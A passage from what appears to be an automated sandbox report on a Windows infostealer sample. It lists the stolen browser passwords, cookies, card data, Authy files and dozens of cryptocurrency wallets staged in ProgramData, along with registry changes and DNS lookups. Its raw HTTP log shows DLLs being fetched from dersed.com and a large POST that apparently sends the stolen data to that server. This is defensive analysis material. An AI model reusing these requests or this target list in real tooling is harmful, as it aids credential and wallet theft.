- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD\\\n",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX\\",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
- * Deleted Files:
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets",
- "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025\\data",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A\\data"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dersed.com",
- "answers":
- "data": "104.200.67.209",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- * Domains:
- "ip": "104.200.67.209",
- "domain": "dersed.com"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://dersed.com/288",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/288",
- "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 2,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://dersed.com/",
- "user-agent": "",
- "method": "POST",
- "host": "dersed.com",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40452\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP: (none recorded in this report)
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "72.11.140.50",
- "inaddrarpa": "",
- "hostname": "ip-api.com"
- "country_name": "United States",
- "ip": "104.200.67.209",
- "inaddrarpa": "",
- "hostname": "dersed.com"
- * Network Communication - IRC: (none recorded in this report)